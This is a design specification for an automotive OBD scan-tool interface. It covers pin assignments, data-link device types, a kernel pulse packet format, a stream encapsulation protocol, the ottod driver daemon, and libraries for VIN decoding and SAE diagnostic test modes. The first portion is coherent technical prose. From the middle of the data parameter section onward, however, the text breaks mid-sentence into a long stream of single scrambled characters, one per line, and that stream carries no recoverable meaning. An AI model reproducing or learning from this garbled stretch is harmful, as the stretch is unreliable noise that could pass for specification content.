8 | CTS | in | delta | VPW/PWM RX
9 | RI | in | falling edge |

Table 6: Serial Hardware Interface Pin Assignments
DB-9 pin | serial function | direction | interrupt | VPW/PWM | ISO | CAN
1 | DCD | in | delta | | |
2 | RXD | in | no | | UART RX (K-line RX) |
3 | TXD | out | no | | UART TX (K-line TX) |
4 | DTR | out | no | software TX | L-line TX | TX
5 | GND | | no | signal ground
6 | DSR | in | delta | software RX | L-line RX | RX
7 | RTS | out | no | | |
8 | CTS | in | delta | | |
9 | RI | in | falling edge | | |

1.2.2 Parallel

This device interfaces with a parallel port as specified by IEEE 1284. This device supports the VPW, PWM, and ISO bus types. Since only one pin on the parallel port triggers an interrupt, and then only on the rising edge, additional hardware as well as software overhead is necessary to accommodate interfaces on this port.

Table 7: Parallel Hardware Interface Pin Assignments
DB-25 pin | parallel port function | direction | interrupt | function
1 | /STROBE | out | |
2 | D0 | out | | ISO K-line TX
3 | D1 | out | | ISO L-line TX
4 | D2 | out | | VPW/PWM TX
5 | D3 | out | | CAN TX
6 | D4 | out | |
7 | D5 | out | |
8 | D6 | out | |
9 | D7 | out | |
10 | /ACK | in | positive edge | RX wired-OR
11 | BUSY | in | | ISO K-line RX
12 | PE | in | | ISO L-line RX
13 | SELIN | in | | VPW/PWM RX
14 | /AUTOFD | out | |
15 | /ERROR | in | | CAN RX
16 | /INIT | out | |
17 | /SEL | out | |
18-25 | GND | | | signal ground

1.2.3 GPIO

The GPIO data link device uses general purpose IO (GPIO) pins on a microprocessor or peripheral controller. A different kernel driver will be required for each device due to variations in the specific hardware used.

1.3 Hardware Data Link Devices

These devices utilize more hardware to decode the data link protocol than software data link devices. These devices have more complex hardware, are generally more expensive, but require less host system resources to operate.

1.3.1 Microcontroller

These devices use a general purpose microcontroller to perform the real time functions of data link decode. Any general purpose microcontroller would be suitable, such as the 68HC11, 8051, or more modern variants such as the PIC or AVR. In addition to the microcontroller, additional circuitry is necessary to interface the bus physical layer.

There are a few microcontrollers designed specifically for automotive diagnostic interface applications. These devices are generally restricted to the network protocols necessary for implementing a scan tool. Devices may contain some or all of the physical layer interface circuitry. These devices include the Elm Electronics ELM32xx and the Ozen Elektronik Mobydic.

1.3.2 Programmable Hardware

This device leverages the programmable nature of an off-the-shelf USB to serial converter. As with the general purpose microcontroller designs, additional circuitry is necessary to interface to the bus physical layer. Custom firmware is loaded from the host machine to the USB adapter to perform decode of the data link protocol.

The interface based on programmable hardware, such as an FPGA or PLD, performs data link decode with programmable logic. The additional circuitry needed is the physical interface to the host and the automobile. A programmable hardware device can potentially yield better performance, which matters most when supporting more than one bus in a single device, and when supporting high data rate busses.

1.3.3 Development Board

This interface is based on an embedded PC. This device is much like a software data link device, in that a general purpose computer performs data link decode. However, that computer does not perform other functions such as managing a user interface, but instead communicates over a network to another computer. The firmware for such devices may be the same as a software data link device, i.e., a Linux kernel device driver, or it may run a more specialized driver under a simpler operating system such as eCos or DOS.

2 Device Protocols

2.1 Software Data Link Device Kernel Interface

The kernel device driver presents a character device with raw access to the capabilities of the device. Data is sent to and from the device file, and control information is passed via ioctls.

The data is composed of 32 bit packets. Each packet specifies one pulse. The format of each data packet is described in Table 8.

Table 8: Data Packet Format
bit | function
31-28 | bus number
27-24 | unused, reserved for future expansion
23 | pulse polarity
22-0 | pulse length in nanoseconds (1 ns - 16.8 ms, +/- 1 ns)

Bus configuration. The following ioctls are used to specify the busses to enable:

• set_busenable(int busmask)
• get_busenable(int *busmask)

The bus interfaces to enable are specified as a bit mask; a set bit enables the specified bus. Busses that are not enabled will not receive or send data.

Pulse configuration. The following ioctls are used to configure certain pulses:

• set_pulse(int id, int pulse)
• get_pulse(int id, int *pulse)

The interframe separation (IFS) time is the minimum pulse required between two packets, also called the bus idle time. Any pulse longer than this is assumed to be equivalent to, and is reported as, this length. The break signal is the maximum asserted pulse width, used to interrupt a transfer.

Table 9: Pulse Configuration IDs
Name | Value | Description
IFS | 0 | Deasserted bus timeout, also known as interframe separation.
BREAK | 1 | Asserted bus timeout, also known as break.

The odd IDs specify pulses for an asserted bus and the even IDs specify pulses for a deasserted bus. Therefore, the logical polarity of the pulse is specified by the lowest bit. Table 9 lists the defined pulse IDs. The time parameter is specified in the same format as the data packets. The pulse polarity specifies the physical polarity of the signal, to allow for electrically inverted busses and/or interfaces. The bus number field of the pulse is ignored.

2.2 OBD Over Stream Protocol

The OBD over stream protocol is used to encapsulate packetized OBD data over a byte stream. It is used to tunnel automotive busses over serial lines and sockets.

Table 10 summarizes byte sequences in the stream that have special meaning. Where applicable, these byte sequences and their numeric values are shared with similar implementations (e.g., SLIP and KISS).

Table 10: OBD Over Stream Control Characters
byte sequence | meaning
END | End of packet.
ESC ESC_END | END data in packet.
ESC ESC_ESC | ESC data in packet.

For busses that specify an initialization procedure that does not utilize the usual bus symbols, this procedure will be performed automatically the first time the socket is opened. If the initialization procedure can determine whether or not a bus is present, this information is available through the control socket. Any finalization procedure is performed after all applications close the socket.

An additional socket exists for performing configuration and out of band control of bus interfaces. Control functions include the following:

• Query bus interface parameters,
• Change bus interface parameters,
• Transmit bus commands (such as initialization or finalization), and
• Retrieve results of previous commands.

The following parameters are available for each bus interface:

• Bus type (vpw, pwm, iso, can, or auto),
• Bus speed in bits per second, or zero for default rate, and
• Initialization to perform on socket open (none, fast, slow, carb, or auto).

2.3 Network Interface

• todo: sockopts: network protocol, speed, init; address: promiscuous mode for sniffing; support AF_PACKET

2.4 OBD Over IP Protocol

• todo: OBD over other stuff, too
• todo: encapsulated packet format, including bus type, IFR, normalization bit

3 Drivers

3.1 Kernel Driver

A kernel driver is required to perform the interrupt and timing functions for each software data link device. There is a different kernel driver for each variant of the software data link device.

3.2 Driver Daemon (ottod)

The driver daemon provides a unified interface to all the various hardware interfaces. The daemon also provides some buffering and other higher level functions. For the software data link interfaces, data link decode is done in ottod. Multiple applications may connect to a single driver daemon. A single ottod may support more than one bus through one or more devices.

The driver daemon communicates with physical devices through a kernel device driver, either a standard serial device for hardware data link devices or the custom device driver for software data link devices. Applications communicate with the driver daemon either through local AF_UNIX sockets or through a network interface of type AF_OBD.

Local socket communication is specified in section 2.2. Data is passed through one socket per bus interface while control information is passed through another socket. The network interface implementation is specified in section 2.3. Data is passed through a socket of AF_OBD type, while control information is passed via getsockopt() and setsockopt().

The driver daemon is configured at runtime to associate bus interfaces with local sockets or network interfaces. Configuration of the driver daemon includes the following for each bus interface:

• Device file to physical device,
• Device type,
• Device specific options,
• Bus number within device,
• Allowed bus types,
• Default bus type and speed, and
• Default initialization type.

4 Libraries

The library functionality is minimally split up to allow logical groups of functions to be separated from others without having an inordinate number of libraries to keep track of. Functions that are shared between different platforms are in their own library since they will be built differently from other functions. Notably, they will require much broader cross-compilation support. Functions related to a single standard, governing body, manufacturer, or governmental mandate will be grouped together in their own library. Only where a specific need arises will functions be split into libraries further than this.

4.1 Data Link Decode

The data link decode library contains the functionality necessary to decode the data link layer on software data link devices. The data link layer is specified in SAE J1850 for VPW and PWM, and in ISO 14230-1 for ISO. Some devices may only support a subset of the data link layers if they cannot meet the timing requirements necessary for the faster bus types.

The library can be configured at compile time as well as run time to omit the unsupported bus types. Compile time configuration is particularly necessary to reduce code size for hardware data link devices. The data link decode routines are shared, where possible, between all software and hardware data link decode platforms. These platforms include the host computer, the development board, general purpose microcontrollers, and the USB serial adapter. Constants are provided to specify all the relevant pulses for each bus.

The library provides the following functions:

• decode: Decode a series of pulses into data bytes.
• encode: Encode data bytes into a series of pulses.

4.2 Vehicle Identification Number (libvin)

The vehicle identification number (VIN) library contains routines to decode the VIN of a vehicle. For vehicles manufactured after 1980, the format of the VIN is specified in ISO 3779 and ISO 3780. From the VIN it is possible to determine specifications of a vehicle including make (manufacturer), model, model year, trim level, country of origin, and other vehicle information. The library also contains a routine to verify the VIN checksum. Some information may not be available for all vehicles, depending on many factors including the willingness of the manufacturer to provide such information to the public.

Each entry is specified as a key/value pair: the key is a pattern match expression on the VIN, and the value is a description of some property of the vehicle. Multiple matches are allowed to prevent redundancy in the database. The library will define the data type as specified in Table 11 for representing a decoded VIN.

The library provides the following functions:

• checksum: Calculate the checksum for a VIN. This value may be compared to the appropriate position to verify a checksum, or assigned to that position to create a valid VIN.
• lookup: Look up the specified VIN in the database.

Table 11: Decoded VIN Data Type
member name | description
country | Country of manufacture.
manufacturer | Manufacturer name (e.g., Ford).
make | Make or division (e.g., Land Rover).
model | Model name (e.g., Discovery).
series | Series or model variant (e.g., SE).
body | Body type (number of doors, etc.).
engine | Engine size and fuel type.
transmission | Transmission, weight class.
weight | Gross vehicle weight rating (GVWR).
emission | Emission system or rating.
restraint | Restraint system.
year | Model year.
plant | Assembly plant.
serial | Manufacture sequence number.

4.3 Diagnostic Test Modes (libobd2)

The OBD2 library implements the majority of the SAE OBD2 specification. Support for each group of functionality is described below. See the referenced specifications for more detailed information about the features. For certain data, such as DTC tables and physical addresses, the library contains SAE specified data as well as manufacturer specified data. Manufacturer data applicability is determined based on VIN pattern matching.

Network layer. Support for the network layer packet as specified in SAE J1850. A data structure is defined to facilitate formatting of data into network packets for requests and decoding data from replies. The data structure contains the entire packet, including header and checksum. The network layer support provides the following functions:

• send: Write a data packet on the specified bus.
• read: Read a data packet from the specified bus.
• crc: Compute the checksum of a packet.

Diagnostic test modes. Support for the diagnostic test modes as specified in SAE J1979. Diagnostic test modes supported are as follows:

• Mode 0x01: Request current powertrain diagnostic data,
• Mode 0x02: Request powertrain freeze frame data,
• Mode 0x03: Request emission-related powertrain diagnostic trouble codes,
• Mode 0x04: Clear/reset emission-related diagnostic information,
• Mode 0x05: Request oxygen sensor monitoring test results,
• Mode 0x06: Request on-board monitoring test results for non-continuously monitored systems,
• Mode 0x07: Request on-board monitoring test results for continuously monitored systems,
• Mode 0x08: Request control of on-board system, test, or component, and
• Mode 0x09: Request vehicle information.

For each test mode, data structures are defined to facilitate formatting of data into network packets for requests and decoding data from replies. Data structures shall be defined based on the formats defined in SAE J1979. All modes shall have a request format and a reply format defined. Modes 0x01, 0x02, 0x05, and 0x06 have an additional reply format defined for messages that request the mode functions (PIDs, test IDs) supported.

Tables of constants will also be defined based on SAE J1979. The following tables shall be defined:

• PIDs for modes 0x01 and 0x02,
• bit mapped data for PIDs 0x01, 0x03, 0x12, 0x13, 0x1E in modes 0x01 and 0x02,
• constants for PID 0x1C in modes 0x01 and 0x02,
• test IDs for mode 0x05,
• minimum, maximum, and scaling values for tests in mode 0x05 (in unified SLOT definitions?),
• test IDs for mode 0x06,
• test IDs for mode 0x08, and
• information type IDs for mode 0x09.

Diagnostic trouble codes shall be handled separately, via additional library functions, so that they may be customized to each vehicle.

Enhanced diagnostics. Support for enhanced diagnostic test modes as specified in SAE J2190. Enhanced diagnostic test modes supported are the following:

• Mode 0x10: Initiate diagnostic operation,
• Mode 0x11: Request module reset,
• Mode 0x12: Request diagnostic freeze frame data,
• Mode 0x13: Request diagnostic trouble code information,
• Mode 0x14: Clear diagnostic information,
• Mode 0x17: Request status of diagnostic trouble codes,
• Mode 0x18: Request diagnostic trouble codes by status,
• Mode 0x20: Return to normal operation,
• Mode 0x21: Request diagnostic data by offset,
• Mode 0x22: Request diagnostic data by parameter identification,
• Mode 0x23: Request diagnostic data by memory address,
• Mode 0x24: Request scaling and offset of PID,
• Mode 0x25: Stop transmitting requested data,
• Mode 0x26: Specify data rates,
• Mode 0x27: Security access mode,
• Mode 0x28: Disable normal message transmission,
• Mode 0x29: Enable normal message transmission,
• Mode 0x2A: Request diagnostic data packet(s),
• Mode 0x2B: Dynamically define data packet by single byte offsets,
• Mode 0x2C: Dynamically define diagnostic data packet,
• Mode 0x2F: Input/output control by PID,
• Mode 0x30: Input/output control by data value ID,
• Mode 0x31: Perform diagnostic routine by test number - start routine,
• Mode 0x32: Perform diagnostic routine by test number - stop routine,
• Mode 0x33: Perform diagnostic routine by test number - request routine results,
• Mode 0x34: Data transfer - download (tool to module),
• Mode 0x35: Data transfer - upload (module to tool),
• Mode 0x36: Data transfer - transfer,
• Mode 0x37: Data transfer - exit,
• Mode 0x38: Perform diagnostic routine at a specified address - enter routine,
• Mode 0x39: Perform diagnostic routine at a specified address - exit routine,
• Mode 0x3A: Perform diagnostic routine at a specified address - request routine results,
• Mode 0x3B: Write data block,
• Mode 0x3C: Test device present, and
• Mode 0x7F: General response message.

For each test mode, data structures are defined to facilitate formatting of data into network packets for requests and decoding data from replies. Data structures shall be defined based on the formats defined in SAE J2190. All modes except modes 0x3F and 0x7F shall have a request format and a reply format defined. Modes 0x13, 0x17, and 0x18 have an additional reply format to return the number of DTCs stored as well as the actual DTCs. Mode 0x27 has an additional reply format for optional additional reply data. Mode 0x3F has a single request format. Mode 0x7F has a single response format, the general response that may be used in response to any enhanced diagnostic test mode request.

Tables of constants will also be defined based on SAE J2190. The following tables shall be defined:

• level of diagnostics for mode 0x10,
• bit mapped status data for mode 0x18,
• response repeat options for modes 0x21, 0x22, and 0x23,
• scaling bytes for mode 0x24 (defining general SLOTs?),
• data rate constants for mode 0x26,
• dynamic packet definitions for mode 0x2C, and
• response codes for mode 0x7F.

Diagnostic trouble codes shall be handled separately, via additional library functions, so that they may be customized to each vehicle.

Headers and packet decode. Support for header and packet decode as specified in SAE J1850 and SAE J2178-1. Data structures are defined to facilitate formatting of data into network packets for requests and decoding data from replies. Data structures defined are the following:

• single byte header,
• one byte consolidated header, and
• three byte consolidated header.

Tables of constants are defined for the following information:

• header flags,
• message types,
• message operations,
• extended addressing types, and
• geographical address map.

Physical addressing. Physical addressing as specified in SAE J2178-1. Standard defined types will be supported as well as manufacturer specific addresses. Addresses will be maintained in an extensible database to allow a user to easily provide additional addressing information.

Data parameter definitions. Support for data parameter definitions as specified in SAE J2178-2. Data structures and tables of constants are defined to facilitate decoding of the various data parameter assignments. Where applicable, manufacturer definitions are supported and defined separately from standard definitions. The following data structures are defined: PID bit mapping. For ease of diagnostics, data is refer
Y
_
U
Y
c
V
U
U
e
Z
c
T
_
{
`
e
`
Q
Y
}
V
Z
V
^
Y
`
Y
Z
Z
Y
t
Y
Z
¢
Y
_
U
Y
_
]
^
j
Y
Z
fP
[
q
g
S
`
Z
]
U
`
]
Z
Y
O
p
`
V
j
W
Y
e
t
P
[
q
{
Z
e
]
}
T
_
{
S
T
S
c
Y
£
_
Y
c
È
V
S
r
Y
W
W
V
S
c
Y
`
V
T
W
Y
c
P
[
q
V
S
S
T
{
_
^
Y
_
`
S
t
e
Z
`
Q
Y
t
e
W
W
e
r
T
_
{
{
Z
e
]
}
S
•
l
p
§
N
y
U
e
^
}
V
`
T
j
W
Y
È
•
Y
_
{
T
_
Y
È
•
`
Z
V
_
S
^
T
S
S
T
e
_
È
•
j
Z
V
s
Y
S
©
`
T
Z
Y
S
©
r
Q
Y
Y
W
S
È
•
S
`
Y
Y
Z
T
_
{
È
•
S
]
S
}
Y
_
S
T
e
_
È
•
Z
Y
S
`
Z
V
T
_
`
S
È
•
c
Z
T
v
Y
Z
T
_
t
e
Z
^
V
`
T
e
_
È
•
z
i
p
o
È
•
U
e
_
v
Y
_
T
Y
_
U
Y
È
N
y
•
S
Y
U
]
Z
T
`
R
È
•
Y
W
Y
U
`
Z
T
U
v
Y
Q
T
U
W
Y
Y
_
Y
Z
{
R
`
Z
V
_
S
t
Y
Z
S
R
S
`
Y
^
È
•
U
e
_
£
{
]
Z
V
`
T
e
_
U
e
c
Y
S
È
V
_
c
•
^
T
S
U
Y
W
W
V
_
Y
e
]
S
O
i
V
W
]
Y
S
V
Z
Y
S
}
Y
U
T
£
Y
c
V
U
U
e
Z
c
T
_
{
`
e
`
Q
Y
S
U
V
W
T
_
{
È
W
T
^
T
`
È
e
ë
S
Y
`
È
V
_
c
`
Z
V
_
S
t
Y
Z
t
]
_
U
`
T
e
_
f
l
X
m
¤
g
c
Y
£
_
T
`
T
e
_
S
O
¤
Q
T
S
}
Z
e
v
T
c
Y
S
`
Q
Y
^
Y
V
_
T
_
{
t
e
Z
V
_
R
}
V
Z
`
T
U
]
W
V
Z
c
V
`
V
O
¤
Q
Y
t
e
W
W
e
r
T
_
{
l
X
m
¤
c
Y
£
_
T
`
T
e
_
S
V
Z
Y
]
S
Y
c
•
}
V
U
s
Y
`
Y
c
fP
¤
g
È
•
j
T
`
^
V
}
}
Y
c
r
T
`
Q
e
]
`
^
V
S
s
f~
d
P
g
È
•
]
_
S
T
{
_
Y
c
_
]
^
Y
Z
T
U
f·
q
d
g
è
Y
Z
e
È
è
S
Q
e
Z
`
f
3
|
j
T
`
g
È
è
|
j
T
`
È
è
N
ª
j
T
`
È
è
h
n
j
T
`
È
è
a
h
j
T
`
È
•
`
r
e
4S
U
e
^
}
W
Y
^
Y
_
`
S
T
{
_
Y
c
_
]
^
Y
Z
T
U
f
l
q
d
g
È
V
_
c
•
S
`
V
`
Y
Y
_
U
e
c
Y
c
f
l
§
u
g
O
²
¯
L
/
L
L
H
J
L
I
L
H
L
l
]
}
}
e
Z
`
t
e
Z
S
T
_
{
W
Y
j
R
`
Y
^
Y
S
S
V
{
Y
S
V
S
S
}
Y
U
T
£
Y
c
T
_
l
p
§
h
N
y
|
¢
a
O
p
`
V
j
W
Y
e
t
U
e
_
S
`
V
_
`
S
S
Q
V
W
W
j
Y
c
Y
£
_
Y
c
t
e
Z
t
Z
V
^
Y
k
u
S
t
e
Z
V
W
W
e
_
Y
j
R
`
Y
Q
Y
V
c
Y
Z
S
È
j
e
`
Q
S
T
_
{
W
Y
j
R
`
Y
Q
Y
V
c
Y
Z
S
V
_
c
U
e
_
S
e
W
T
c
V
`
Y
c
`
Q
Z
Y
Y
j
R
`
Y
Q
Y
V
c
Y
Z
S
O
p
`
V
j
W
Y
e
t
U
e
_
S
`
V
_
`
S
S
Q
V
W
W
V
W
S
e
j
Y
c
Y
£
_
Y
c
t
e
Z
`
Q
Y
S
Y
U
e
_
c
V
Z
R
k
u
S
t
e
Z
Y
W
Y
U
`
Z
T
U
v
Y
Q
T
U
W
Y
Y
_
Y
Z
{
R
`
Z
V
_
S
t
Y
Z
S
R
S
`
Y
^
f
§
i
¢
§
¤
l
g
^
Y
S
S
V
{
Y
S
O
.
I
L
L
/
L
L
H
J
L
I
L
H
L
l
]
}
}
e
Z
`
t
e
Z
`
Q
Z
Y
Y
j
R
`
Y
Q
Y
V
c
Y
Z
^
Y
S
S
V
{
Y
S
V
S
S
}
Y
U
T
£
Y
c
T
_
l
p
§
h
N
y
|
¢
n
O
p
`
V
j
W
Y
e
t
U
e
_
S
`
V
_
`
S
S
Q
V
W
W
j
Y
c
Y
£
_
Y
c
t
e
Z
}
Z
T
^
V
Z
R
k
u
S
t
e
Z
t
]
_
U
`
T
e
_
V
W
V
c
c
Z
Y
S
S
T
_
{
r
T
`
Q
`
Q
Z
Y
Y
j
R
`
Y
Q
Y
V
c
Y
Z
S
O
p
c
c
T
`
T
e
_
V
W
W
R
È
`
V
j
W
Y
S
e
t
S
Y
U
e
_
c
V
Z
R
k
u
S
S
Q
V
W
W
j
Y
c
Y
£
_
Y
c
t
e
Z
`
Q
Y
t
e
W
W
e
r
T
_
{
^
Y
S
S
V
{
Y
`
R
}
Y
S
•
Y
_
{
T
_
Y
`
e
Z
\
]
Y
È
•
Y
_
{
T
_
Y
V
T
Z
T
_
`
V
s
Y
È
•
`
Q
Z
e
`
`
W
Y
È
•
V
T
Z
U
e
_
c
T
`
T
e
_
T
_
{
U
W
]
`
U
Q
È
N
|
•
Y
_
{
T
_
Y
[
P
d
È
•
r
Q
Y
Y
W
S
È
•
v
Y
Q
T
U
W
Y
S
}
Y
Y
c
È
•
`
Z
V
U
`
T
e
_
U
e
_
`
Z
e
W
È
•
j
Z
V
s
Y
S
È
•
S
`
Y
Y
Z
T
_
{
È
•
`
Z
V
_
S
^
T
S
S
T
e
_
È
•
Y
_
{
T
_
Y
S
Y
_
S
e
Z
S
1
e
`
Q
Y
Z
È
•
Y
_
{
T
_
Y
U
e
e
W
V
_
`
È
•
Y
_
{
T
_
Y
e
T
W
È
•
Y
_
{
T
_
Y
S
R
S
`
Y
^
S
1
e
`
Q
Y
Z
È
•
S
]
S
}
Y
_
S
T
e
_
È
•
v
Y
Q
T
U
W
Y
S
}
Y
Y
c
U
e
_
`
Z
e
W
È
•
Y
W
Y
U
`
Z
T
U
v
Y
Q
T
U
W
Y
Y
_
Y
Z
{
R
`
Z
V
_
S
t
Y
Z
S
R
S
`
Y
^
È
•
U
Q
V
Z
{
T
_
{
S
R
S
`
Y
^
È
•
Y
W
Y
U
`
Z
T
U
V
W
Y
_
Y
Z
{
R
^
V
_
V
{
Y
^
Y
_
`
È
•
e
c
e
^
Y
`
Y
Z
È
•
t
]
Y
W
S
R
S
`
Y
^
È
•
T
{
_
T
`
T
e
_
S
r
T
`
U
Q
©
S
`
V
Z
`
Y
Z
È
•
`
Y
W
W
`
V
W
Y
S
È
•
U
W
T
^
V
`
Y
U
e
_
`
Z
e
W
f
z
i
p
o
g
È
•
r
T
_
c
e
r
r
T
}
Y
Z
©
r
V
S
Q
Y
Z
È
•
^
T
Z
Z
e
Z
S
È
•
c
e
e
Z
W
e
U
s
S
È
•
Y
¨
`
Y
Z
_
V
W
V
U
U
Y
S
S
È
•
S
Y
V
`
^
e
`
T
e
_
©
U
e
_
`
Z
e
W
È
•
r
T
_
c
e
r
S
È
•
S
`
Y
Y
Z
T
_
{
U
e
W
]
^
_
È
N
•
S
Y
V
`
S
r
T
`
U
Q
Y
S
È
•
Z
Y
S
`
Z
V
T
_
`
S
È
•
Y
¨
`
Y
Z
T
e
Z
W
V
^
}
S
e
]
`
V
{
Y
È
•
Y
¨
`
Y
Z
T
e
Z
W
V
^
}
S
È
•
T
_
`
Y
Z
T
e
Z
W
V
^
}
S
e
]
`
V
{
Y
È
•
T
_
`
Y
Z
T
e
Z
W
V
^
}
S
È
•
`
T
Z
Y
S
È
•
c
Y
t
Z
e
S
`
È
•
c
T
S
}
W
V
R
S
È
•
Y
¨
`
Y
Z
T
e
Z
Y
_
v
T
Z
e
_
^
Y
_
`
È
•
T
_
`
Y
Z
T
e
Z
Y
_
v
T
Z
e
_
^
Y
_
`
È
•
`
T
^
Y
©
c
V
`
Y
È
•
v
Y
Q
T
U
W
Y
T
c
Y
_
`
T
£
U
V
`
T
e
_
È
V
_
c
•
_
Y
`
r
e
Z
s
U
e
_
`
Z
e
W
O
¤
V
j
W
Y
S
r
T
W
W
j
Y
c
Y
£
_
Y
c
t
e
Z
Y
¨
`
Y
_
c
Y
c
V
c
c
Z
Y
S
S
Y
S
t
e
Z
Y
V
U
Q
e
t
`
Q
Y
t
e
W
W
e
r
T
_
{
t
]
_
U
`
T
e
_
•
j
Z
V
s
Y
S
È
`
T
Z
Y
S
È
V
_
c
r
Q
Y
Y
W
S
È
•
z
i
p
o
e
_
Y
S
È
•
r
T
_
c
e
r
r
T
}
Y
Z
©
r
V
S
Q
Y
Z
È
c
Y
t
Z
e
S
`
È
}
Q
e
`
e
U
Y
W
W
È
•
c
e
e
Z
S
V
_
c
c
e
e
Z
W
e
U
s
S
È
•
S
Y
V
`
S
V
_
c
Z
Y
S
`
Z
V
T
_
`
S
È
•
r
T
_
c
e
r
S
È
•
Y
¨
`
Y
Z
_
V
W
W
V
^
}
S
È
V
_
c
•
T
_
`
Y
Z
_
V
W
W
V
^
}
S
O
H
²
³
I
´
¯
L
³
J
L
J
H
H
H
L
l
]
}
}
e
Z
`
t
e
Z
V
c
T
V
{
_
e
S
`
T
U
`
Z
e
]
j
W
Y
U
e
c
Y
S
fu
¤
o
g
V
S
S
}
Y
U
T
£
Y
c
T
_
l
p
§
h
¡
N
h
O
p
c
V
`
V
j
V
S
Y
S
Q
V
W
W
j
Y
c
Y
£
_
Y
c
`
e
S
`
e
Z
Y
V
_
c
^
V
_
V
{
Y
u
¤
o
S
V
S
c
Y
£
_
Y
c
j
R
S
`
V
_
c
V
Z
c
S
V
S
r
Y
W
W
V
S
j
R
^
V
_
]
t
V
U
`
]
Z
Y
Z
O
¤
Q
Y
c
V
`
V
j
V
S
Y
S
r
T
W
W
j
Y
T
_
V
t
e
Z
^
`
Q
V
`
U
V
_
j
Y
]
}
c
V
`
Y
c
Y
V
S
T
W
R
V
`
Z
]
_
`
T
^
Y
j
R
`
Q
Y
]
S
Y
Z
O
¤
Q
Y
c
V
`
V
j
V
S
Y
S
U
Q
Y
^
V
t
e
Z
S
`
e
Z
T
_
{
u
¤
o
S
T
S
S
}
Y
U
T
£
Y
c
T
_
`
V
j
W
Y
O
¤
Q
Y
c
V
`
V
j
V
S
Y
V
U
U
Y
S
S
t
]
_
U
`
T
e
_
S
r
T
W
W
}
Z
e
v
T
c
Y
S
R
S
`
Y
^
{
Z
e
]
}
T
_
t
e
Z
^
V
`
T
e
_
r
Q
Y
_
V
_
]
_
s
_
e
r
_
u
¤
o
T
S
Z
Y
\
]
Y
S
`
Y
c
O
¤
Q
Y
c
V
`
V
j
V
S
Y
r
T
W
W
}
Z
e
v
T
c
Y
`
Q
Y
t
e
W
W
e
r
T
_
{
t
]
_
U
¢
`
T
e
_
S
-
J
³
¯
´
µ
[
Y
`
]
Z
_
S
V
c
T
V
{
_
e
S
`
T
U
^
Y
S
S
V
{
Y
t
Z
e
^
W
e
e
s
T
_
{
]
}
`
Q
Y
S
}
Y
U
T
£
Y
c
u
¤
o
T
_
`
Q
Y
c
V
`
V
j
V
S
Y
O
h
¡
^
Y
^
j
Y
Z
c
Y
S
U
Z
T
}
`
T
e
_
c
`
U
u
¤
o
S
}
Y
U
T
£
Y
c
T
_
V
W
W
_
]
^
Y
Z
T
U
t
e
Z
^
V
`
f
P
¡
¡
¡
¡
T
S
¡
¡
¡
¡
g
O
^
Y
S
S
V
{
Y
u
Y
S
U
Z
T
}
`
T
e
_
O
¤
V
j
W
Y
N
h
u
¤
o
u
V
`
V
j
V
S
Y
l
U
Q
Y
^
V
ÿ
M
ÿ°
²
²
,
J
µ
I
³
¯
q
e
_
¢
m
~
u
}
Z
e
`
e
U
e
W
S
r
T
W
W
j
Y
S
]
}
}
e
Z
`
Y
c
V
S
V
S
T
_
{
W
Y
W
T
j
Z
V
Z
R
}
Y
Z
}
Z
e
`
e
U
e
W
O
k
_
T
`
T
V
W
W
R
_
e
S
]
U
Q
}
Z
e
`
e
U
e
W
S
r
T
W
W
j
Y
S
]
}
}
e
Z
`
Y
c
O
ÿ
M
ÿ
¶
G
$
L
!
L
¯
«
µ
µ
¯
³
H
²
5
´
²
³
²
¯
`
e
c
e
^
]
U
Q
r
e
Z
s
_
Y
Y
c
Y
c
Q
Y
Z
Y
È
c
Y
£
_
Y
`
Q
T
S
t
]
_
U
`
T
e
_
V
W
T
`
R
`
e
c
e
U
e
^
}
]
`
Y
Q
e
Z
S
Y
}
e
r
Y
Z
`
e
c
e
t
]
Y
W
Y
U
e
_
e
^
R
U
V
W
U
´
²
³
²
`
e
c
e
í6
7
8
8
õ
ò
ó
ô
þ
ò
ý
ñ
ÿ°
ÿ
F
²
L
I
H
³
L
¸
²
&
´
I
H
²
³
²
&
¤
Q
Y
T
_
`
Y
Z
t
V
U
Y
U
e
_
£
{
]
Z
V
`
T
e
_
]
`
T
W
T
`
R
}
Z
e
v
T
c
Y
S
V
U
e
_
v
Y
_
T
Y
_
`
^
Y
`
Q
e
c
`
e
\
]
Y
Z
R
V
_
c
^
e
c
T
t
R
`
Q
Y
S
Y
`
`
T
_
{
S
t
e
Z
V
j
]
S
T
_
`
Y
Z
t
V
U
Y
O
p
W
W
e
t
`
Q
Y
S
Y
`
`
T
_
{
S
V
v
V
T
W
V
j
W
Y
V
`
`
Q
Y
T
_
`
Y
Z
t
V
U
Y
W
Y
v
Y
W
È
T
_
U
W
]
c
T
_
{
_
Y
`
r
e
Z
s
`
R
}
Y
V
_
c
S
}
Y
Y
c
V
_
c
T
_
T
`
T
V
W
T
V
`
T
e
_
`
R
}
Y
È
V
Z
Y
V
v
V
T
W
V
j
W
Y
O
ÿ°
ÿ
L
K
I
®
²
I
J
´
µ
¤
Q
Y
_
Y
`
r
e
Z
s
^
e
_
T
`
e
Z
}
Z
e
v
T
c
Y
S
`
Q
Y
V
j
T
W
T
`
R
`
e
V
_
V
W
R
Y
V
_
c
W
e
{
_
Y
`
r
e
Z
s
`
Z
V
)
U
O
¤
Q
Y
V
}
}
W
T
U
V
`
T
e
_
r
T
W
W
U
e
_
_
Y
U
`
`
e
V
S
T
_
{
W
Y
j
]
S
V
_
c
c
]
^
}
_
Y
`
r
e
Z
s
`
Z
V
)
U
O
¤
Q
T
S
}
Z
e
{
Z
V
^
S
Q
V
W
W
c
Y
U
e
c
Y
V
_
c
c
T
S
}
W
V
R
_
Y
`
r
e
Z
s
`
Z
V
)
U
T
_
V
U
e
^
}
V
U
`
`
Y
¨
`
]
V
W
Z
Y
}
Z
Y
S
Y
_
`
V
`
T
e
_
È
W
e
{
_
Y
`
r
e
Z
s
`
Z
V
)
U
`
e
V
£
W
Y
T
_
V
t
e
Z
^
`
Q
V
`
U
V
_
j
Y
Z
Y
V
c
j
V
U
s
W
V
`
Y
Z
È
Z
Y
V
c
_
Y
`
r
e
Z
s
`
Z
V
)
U
t
Z
e
^
V
£
W
Y
S
V
v
Y
c
}
Z
Y
v
T
e
]
S
W
R
È
V
_
c
£
W
`
Y
Z
`
Z
V
)
U
c
T
S
}
W
V
R
Y
c
e
Z
W
e
{
{
Y
c
j
V
S
Y
c
e
_
V
]
S
Y
Z
S
]
}
}
W
T
Y
c
Y
¨
}
Z
Y
S
S
T
e
_
O
¤
Q
Y
c
Y
U
e
c
Y
c
}
V
U
s
Y
`
c
V
`
V
r
T
W
W
T
_
U
W
]
c
Y
È
r
Q
Y
Z
Y
V
}
}
W
T
U
